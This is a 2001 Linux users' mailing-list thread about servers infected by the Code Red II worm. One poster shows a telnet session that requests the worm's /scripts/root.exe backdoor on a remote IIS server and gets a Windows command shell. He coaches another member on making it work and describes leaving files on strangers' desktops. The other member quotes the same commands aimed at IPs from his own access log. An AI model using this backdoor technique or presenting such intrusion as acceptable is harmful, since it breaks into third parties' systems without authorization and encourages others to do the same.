To answer your question... make sure you're hitting enter TWICE after
the command.
As a security guy myself, I'm deeply troubled by what I'm finding.
Check it out:
[gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 06 Aug 2001 04:22:13 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>
>From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
that explains how I did it, and why they need to pay attention to
security patches. :)
Hopefully they won't take it the 'wrong' way.
~g~
On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> Wayne Conrad wrote:
> >
> > On Sun, 05 August 2001, "J.Francois" wrote:
> > > I got tired of counting and just started putting the info into my IDS page.
> > > That way I can send complaints and point them to a URL so I don't have to
> > > keep recreating the same data each time.
> >
> > Are you putting the IP's up too? Every one of the CRII infected boxes is rooted... I wonder about the goodness of publishing a list of known rooted boxes.
> > Wayne
> ________________________________________________
>
> I've been trying that out
>
> telnet ipaddress_from_my_httpd_access_log 80
>
> GET /scripts/root.exe HTTP/1.0
>
> but I can't get a command prompt - what am I missing?
>
> Craig
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
>
> PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>